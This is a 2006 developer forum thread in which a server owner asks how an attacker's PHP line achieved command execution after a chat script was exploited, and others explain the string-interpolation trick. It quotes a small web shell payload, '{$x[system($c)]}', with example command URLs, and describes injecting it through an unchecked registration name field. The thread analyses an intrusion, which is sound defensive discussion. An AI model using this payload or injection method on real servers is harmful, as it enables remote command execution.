469,128 Members | 1,412 Online
Bytes | Developer Community
New Post

Home Posts Topics Members FAQ

Post your question to a community of 469,128 developers. It's quick & easy.

Hacked with system()

Hello,

our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
I couldn't find anything about this on the web (didn't know how to
specify the search to get useful results). Can anybody explain what
happens?

Thanks and best regards,
Ingo

Sep 5 '06 #1
8 1298
Oski wrote:
our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
If you write
$a = "{$x['key']}";

then $a gets the value $x['key'] as expected.

$a = $x[system($c)];

then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).

It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.

I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.

Tim
Sep 5 '06 #2
Tim Martin wrote:
Oski wrote:
>our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.

If you write
$a = "{$x['key']}";

then $a gets the value $x['key'] as expected.

$a = $x[system($c)];

then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).

It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.

I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.
Following up to myself, I should note that this is not as big an issue
as it seems on the surface - it only matters if the malicious user
writes the string literal itself. If they control a variable that is
substituted into the string literal, it isn't a problem. e.g.

$intermediate = "system($c)"; // Set by malicious user from a form input
// or some other non-string-literal

$a = "{$x[$intermediate]}"; // This code written by you, not under the
// control of the malicious user

is fine.

Tim
Sep 5 '06 #3
In article <11**********************@m79g2000cwm.googlegroups .com>,
"Oski" <os**@gmx.dewrote:
Hello,

our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
Well, it's odd. system() returns the last line of output if
successful. But in this case, $name is set to the value of $x where
the key is the last line of the ouput. Is there any $x declaration in
the script?

For instance, this:

<?
$x["var"] = "foobar";
$c = "ls";
$name = "{$x[system($c)]}";
print "Value: $name";
?>

Outpus, after a long list of directories in my root directorie (where
'var' is the last):

Value: foobar

So, "var" is the last directory in the ls listing. And the value of
$x["var"] is "foobar", which is assigned to $name.

Why? I have no idea. I'd have top see the entire script for that.
--
Sandman[.net]
Sep 5 '06 #4
our server got hacked through a security hole in an open source php
chat script.
Which one?

Regards,
Talthen
Sep 5 '06 #5
Sandman wrote:
Why? I have no idea. I'd have top see the entire script for that.
There is no more script, no more than what was posted by me! The other
lines (mentioned as ommitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.

Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...

Ingo.

Sep 5 '06 #6
In article <11*********************@m73g2000cwd.googlegroups. com>,
"Oski" <os**@gmx.dewrote:
Sandman wrote:
Why? I have no idea. I'd have top see the entire script for that.

There is no more script, no more than what was posted by me! The other
lines (mentioned as ommitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.

Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this was also, so I've seen some of these scripts.


--
Sandman[.net]
Sep 5 '06 #7
Oski wrote:
This chat script allowed the user to create a new php script on our
server, [snip]
Surely this is the security hole rather than the script created.
Allowing anyone to write php code that will run on your server is a
Really Bad Idea (tm).

Robin
Sep 5 '06 #8
Sandman wrote:
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this was also, so I've seen some of these scripts.
In this case, the chat script asks for your name and email when
registering.
Then, it creates a php-script (as described in my first post) and
creates lines within it:
$name = "<userinput>";
$email = "<userinput_2";
// and so on ...
So you just have to know where this php script is created/saved and
register with a tampered name and then call this php script with the
desired URL + encoded command strings, like "?c=ls%20-l" etc.

Of course, the real (huuuge!) security hole is creating a php script
with unchecked userinput. (I don't dare to guess what might happen if
you have disabled magic_quotes).

But I could not explain the behaviour of PHP as well, especially as
there is nothing documented about this "feature" to execute code within
a variable assignment.

Ingo

Sep 5 '06 #9

This discussion thread is closed

Replies have been disabled for this discussion.

Similar topics

6 posts views Thread by Bob Bedford | last post: by
reply views Thread by arkain denial | last post: by
reply views Thread by Christian Schuhegger | last post: by
2 posts views Thread by codefixer | last post: by
1 post views Thread by rerdavies | last post: by
5 posts views Thread by David Carter | last post: by
1 post views Thread by CARIGAR | last post: by
By using this site, you agree to our Privacy Policy and Terms of Use.